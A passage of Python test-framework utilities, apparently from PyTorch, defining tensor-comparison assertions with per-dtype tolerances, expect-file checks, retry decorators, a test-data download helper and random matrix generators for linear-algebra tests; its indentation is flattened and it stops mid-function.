# Compares a torch function with a reference function for a given sample input (object of SampleInput)
# Note: only values are compared, type comparison is not done here
def compare_with_reference(self, torch_fn, ref_fn, sample_input, **kwargs):
n_inp, n_args, n_kwargs = sample_input.numpy()
t_inp, t_args, t_kwargs = sample_input.input, sample_input.args, sample_input.kwargs
actual = torch_fn(t_inp, *t_args, **t_kwargs)
expected = ref_fn(n_inp, *n_args, **n_kwargs)
self.assertEqual(actual, expected, exact_device=False)
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like,
device=None, dtype=None, **kwargs):
assert TEST_NUMPY
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
t_cpu = tensor_like.detach().cpu()
if t_cpu.dtype is torch.bfloat16:
t_cpu = t_cpu.float()
a = t_cpu.numpy()
t = tensor_like
else:
d = copy.copy(torch_to_numpy_dtype_dict)
d[torch.bfloat16] = np.float32
a = np.array(tensor_like, dtype=d[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
if t.dtype is torch.bfloat16 and torch_result.dtype is torch.bfloat16 and np_result.dtype is torch.float:
torch_result = torch_result.to(torch.float)
self.assertEqual(np_result, torch_result, **kwargs)
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
# Converts to comparison dtype
dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
rtol = cast(float, rtol)
atol = cast(float, atol)
assert atol is not None
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
return _compare_scalars_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Construct assert messages basd on internal debug message and user provided message.
def _get_assert_msg(self, msg, debug_msg=None):
if msg is None:
return debug_msg
else:
return f"\n{msg}" if debug_msg is None else f"{debug_msg}\n{msg}"
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means test is written wrongly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
def _is_dict(self, obj):
return isinstance(obj, (dict, torch._C.ScriptDict)) # type: ignore[attr-defined]
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified, then the other must be too"
debug_msg: Optional[str] = None
if x is None or y is None:
self.assertTrue(x is None, "left arg is not None while right arg is None")
self.assertTrue(y is None, "left arg is None while right arg not is None")
# Tensor x Number and Number x Tensor comparisons
elif isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
debug_msg = ("Attempted to compare with different is_sparse settings: "
f"Expected: {x.is_sparse}; Actual: {y.is_sparse}.")
super().assertEqual(x.is_sparse, y.is_sparse, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
debug_msg = ("Attempted to compare with different is_quantized settings: "
f"Expected: {x.is_quantized}; Actual: {y.is_quantized}.")
super().assertEqual(x.is_quantized, y.is_quantized, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
if x.is_sparse:
if x.size() != y.size():
debug_msg_sparse = ("Attempted to compare equality of tensors with different sizes: "
f"Expected: {x.size()}; Actual: {y.size()}.")
super().assertTrue(False, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg_sparse))
x = x.coalesce()
y = y.coalesce()
indices_result, debug_msg_indices = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result:
assert debug_msg_indices is not None
debug_msg = "Sparse tensor indices failed to compare as equal! " + debug_msg_indices
super().assertTrue(indices_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
values_result, debug_msg_values = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result:
assert debug_msg_values is not None
debug_msg = "Sparse tensor values failed to compare as equal! " + debug_msg_values
super().assertTrue(values_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg_compare = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_compare is not None
debug_msg = "Quantized representations failed to compare as equal! " + debug_msg_compare
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
result, debug_msg_generic = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_generic is not None
debug_msg = "Tensors failed to compare as equal!" + debug_msg_generic
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif isinstance(x, (np.ndarray, torch.Tensor)) or isinstance(y, (np.ndarray, torch.Tensor)):
def maybe_to_tensor(a: Union[np.ndarray, torch.Tensor]) -> Union[np.ndarray, torch.Tensor]:
if not isinstance(a, np.ndarray):
return a
try:
return torch.from_numpy(a)
except TypeError:
# This happens if the dtype is non-numeric or not supported by torch
return a
def maybe_to_list(a: Any) -> Any:
if not isinstance(a, (np.ndarray, torch.Tensor)):
return a
return a.tolist()
x = maybe_to_tensor(x)
y = maybe_to_tensor(y)
if isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
self.assertEqual(
x, y, atol=atol, rtol=rtol, msg=msg, exact_dtype=exact_dtype, exact_device=exact_device
)
else:
# In case we can't convert the array to a tensor, we fall back to comparing x and y as iterables
self.assertEqual(
maybe_to_list(x),
maybe_to_list(y),
atol=atol,
rtol=rtol,
msg=msg,
exact_dtype=exact_dtype,
exact_device=exact_device
)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
debug_msg = ("Attempted to compare [string] types: "
f"Expected: {repr(x)}; Actual: {repr(y)}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif type(x) == set and type(y) == set:
debug_msg = ("Attempted to compare [set] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif self._is_dict(x) and self._is_dict(y):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
debug_msg = ("Attempted to compare [type] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif is_iterable(x) and is_iterable(y):
debug_msg = ("Attempted to compare the lengths of [iterable] types: "
f"Expected: {len(x)}; Actual: {len(y)}.")
super().assertEqual(len(x), len(y), msg=self._get_assert_msg(msg, debug_msg=debug_msg))
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
super().assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg_scalars = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result:
assert debug_msg_scalars is not None
debug_msg = "Scalars failed to compare as equal! " + debug_msg_scalars
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
super().assertEqual(x, y, msg=msg)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *, # type: ignore[override]
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used simulate deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaises(self, expected_exception, *args, **kwargs):
if self._ignore_not_implemented_error:
context: Optional[AssertRaisesContextIgnoreNotImplementedError] = \
AssertRaisesContextIgnoreNotImplementedError(expected_exception, self) # type: ignore[call-arg]
try:
return context.handle('assertRaises', args, kwargs) # type: ignore[union-attr]
finally:
# see https://bugs.python.org/issue23890
context = None
else:
return super().assertRaises(expected_exception, *args, **kwargs)
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaisesRegex(self, expected_exception, expected_regex, *args, **kwargs):
# Verifies that an exception with the type expected_exception and message
# matching the regular expression defined by expected_regex is thrown.
# If the test is instantiated for a non-native device type (like XLA)
# then the message is not validated.
# Checks whether the test is instantiated for a device type by testing
# if the test class has defined the device_type attribute and,
# if so, tests whether the instantiated device type is native or not
if hasattr(self, 'device_type') and self.device_type not in NATIVE_DEVICES: # type: ignore[attr-defined]
# empty string matches any string
expected_regex = ''
if self._ignore_not_implemented_error:
context = AssertRaisesContextIgnoreNotImplementedError( # type: ignore[call-arg]
expected_exception, self, expected_regex)
return context.handle('assertRaisesRegex', args, kwargs) # type: ignore[attr-defined]
else:
return super().assertRaisesRegex(expected_exception, expected_regex, *args, **kwargs)
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def assertWarnsOnceRegex(self, category, regex=''):
"""Context manager for code that *must always* warn
This filters expected warnings from the test and fails if
the expected warning is not caught. It uses set_warn_always() to force
TORCH_WARN_ONCE to behave like TORCH_WARN
"""
pattern = re.compile(regex)
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
yield
if len(ws) == 0:
self.fail('no warning caught')
self.assertTrue(any([type(w.message) is category for w in ws]))
self.assertTrue(
any([re.match(pattern, str(w.message)) for w in ws]),
f'{pattern}, {[w.message for w in ws if type(w.message) is category]}')
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
# Adjust for producer_version, leave s unmodified
s_tag = re.sub(r'(producer_version): "[0-9.]*"',
r'\1: "CURRENT_VERSION"', s)
f.write(s_tag)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id)) from None
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "CURRENT_VERSION"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
def assertGreaterAlmostEqual(self, first, second, places=None, msg=None, delta=None):
"""Assert that ``first`` is greater than or almost equal to ``second``.
The equality of ``first`` and ``second`` is determined in a similar way to
the ``assertAlmostEqual`` function of the standard library.
"""
if delta is not None and places is not None:
raise TypeError("specify delta or places not both")
if first >= second:
return
diff = second - first
if delta is not None:
if diff <= delta:
return
standardMsg = f"{first} not greater than or equal to {second} within {delta} delta"
else:
if places is None:
places = 7
if round(diff, places) == 0:
return
standardMsg = f"{first} not greater than or equal to {second} within {places} places"
msg = self._formatMessage(msg, standardMsg)
raise self.failureException(msg)
# run code in subprocess and capture exceptions.
@staticmethod
def run_process_no_exception(code, env=None):
import subprocess
popen = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
(stdout, stderr) = popen.communicate()
return (stdout, stderr)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
# remove IN_CI flag since this is a wrapped test process.
# IN_CI flag should be set in the parent process only.
if "IN_CI" in env.keys():
del env["IN_CI"]
(stdout, stderr) = TestCase.run_process_no_exception(code, env=env)
return stderr.decode('ascii')
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError as e:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg) from e
def find_free_port():
"""
Finds an available port and returns that port number.
NOTE: If this function is being used to allocate a port to Store (or
indirectly via init_process_group or init_rpc), it should be used
in conjuction with the `retry_on_connect_failures` decorator as there is a potential
race condition where the allocated port may become unavailable before it can be used
"""
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
return port
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE)):
"""Reruns a test if the test returns a RuntimeError and the exception
contains one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
n_retries = 10
tries_remaining = n_retries
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if any(connect_error in str(error) for connect_error in connect_errors):
tries_remaining -= 1
if tries_remaining == 0:
raise RuntimeError(f"Failing after {n_retries} retries with error: {str(error)}")
time.sleep(random.random())
continue
raise
return wrapper
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e if skip_after_retries else e
return f_retry # true decorator
return deco_retry
# Methods for matrix generation
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, vh = torch.linalg.svd(A, full_matrices=False)
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return (u * s.to(dtype).unsqueeze(-2)) @ vh
def random_well_conditioned_matrix(*shape, dtype, device, mean=1.0, sigma=0.001):
"""
Returns a random rectangular matrix (batch of matrices)
with singular values sampled from a Gaussian with
mean `mean` and standard deviation `sigma`.
The smaller the `sigma`, the better conditioned
the output matrix is.
"""
primitive_dtype = {
torch.float: torch.float,
torch.double: torch.double,
torch.cfloat: torch.float,
torch.cdouble: torch.double
}
x = torch.rand(shape, dtype=dtype, device=device)
m = x.size(-2)
n = x.size(-1)
u, _, vh = torch.linalg.svd(x, full_matrices=False)
s = (torch.randn(*(shape[:-2] + (min(m, n),)), dtype=primitive_dtype[dtype], device=device) * sigma + mean) \
.sort(-1, descending=True).values.to(dtype)
return (u * s.unsqueeze(-2)) @ vh
# Returns a noncontiguous (tensor with the same shape and values as t
# The noncontiguous tensor is constructed such that elements in the innermost
# dimension are separated by zeros or (whenever possible) nans
# TODO: consider more complicated noncontiguity schemes
def noncontiguous_like(t):
# Short-circuits if t is already noncontiguous
if not t.is_contiguous():
return t
# Special-cases 0-dim tensors
if t.ndim == 0:
result = t.detach().unsqueeze(0).repeat_interleave(2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[0] = math.nan
else:
result[0] = 0
result.set_(result.storage(), 1, t.size(), ())
result.requires_grad_(t.requires_grad)
return result
# 1+ dim tensor case
result = torch.repeat_interleave(t.detach(), 2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[..., 1::2] = math.nan
else:
result[..., 1::2] = 0
strides = list(result.stride())
strides[-1] = strides[-1] * 2
result.set_(result.storage(), result.storage_offset(), t.size(), stride=tuple(strides))
result.requires_grad_(t.requires_grad)
return result
# TODO: remove this (prefer make_symmetric_matrices below)
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mT).div_(2)
return A
# Creates a symmetric matrix or batch of symmetric matrices
# Shape must be a square matrix or batch of square matrices
def make_symmetric_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
t = (t + t.mT).div_(2)
return t
def random_hermitian_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mH).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
"""
Returns a batch of random symmetric positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_symmetric_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return A @ A.mT
def random_hermitian_psd_matrix(matrix_size, *batch_dims, dtype=torch.double, device='cpu'):
"""
Returns a batch of random Hermitian positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)), dtype=dtype, device=device)
return A @ A.mH
# TODO: remove this (prefer make_symmetric_pd_matrices below)
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.mT) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
# Creates a symmetric positive-definite matrix or batch of
# such matrices
def make_symmetric_pd_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
i = torch.eye(shape[-1], device=device, dtype=dtype) * 1e-5
return t @ t.mT + i
def random_hermitian_pd_matrix(matrix_size, *batch_dims, dtype, device):
"""
Returns a batch of random Hermitian positive-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_pd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return A @ A.mH + torch.eye(matrix_size, dtype=dtype, device=device)
# Creates a full rank matrix with distinct signular values or
# a batch of such matrices
def make_fullrank_matrices_with_distinct_singular_values(*shape, device, dtype, requires_grad=False):
with torch.no_grad():
t = make_tensor(shape, device=device, dtype=dtype)
u, _, vh = torch.linalg.svd(t, full_matrices=False)
# TODO: improve the handling of complex tensors here
real_dtype = t.real.dtype if t.dtype.is_complex else t.dtype
k = min(shape[-1], shape[-2])
# We choose the singular values to be "around one"
# This is to make the matrix well conditioned
# s = [2, 3, ..., k+1]
s = torch.arange(2, k + 2, dtype=real_dtype, device=device)
# s = [2, -3, 4, ..., (-1)^k k+1]
s[1::2] *= -1.
# 1 + 1/s so that the singular values are in the range [2/3, 3/2]
# This gives a condition number of 9/4, which should be good enough
s.reciprocal_().add_(1.)
# Note that the singular values need not be ordered in an SVD so
# we don't need need to sort S
x = (u * s.to(u.dtype)) @ vh
x.requires_grad_(requires_grad)
return x
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
if A.numel() == 0:
return A
u, _, vh = torch.linalg.svd(A, full_matrices=False)
k = min(rows, columns)
s = torch.linspace(1 / (k + 1), 1, k, dtype=dtype, device=device)
if singular:
# make matrix singular
s[k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0] = 0
return (u * s.unsqueeze(-2)) @ vh
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches to given density as the size
of the matrix is increased and a relatively small value of density
is specified but higher than min(rows, columns)/(rows * columns)
for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
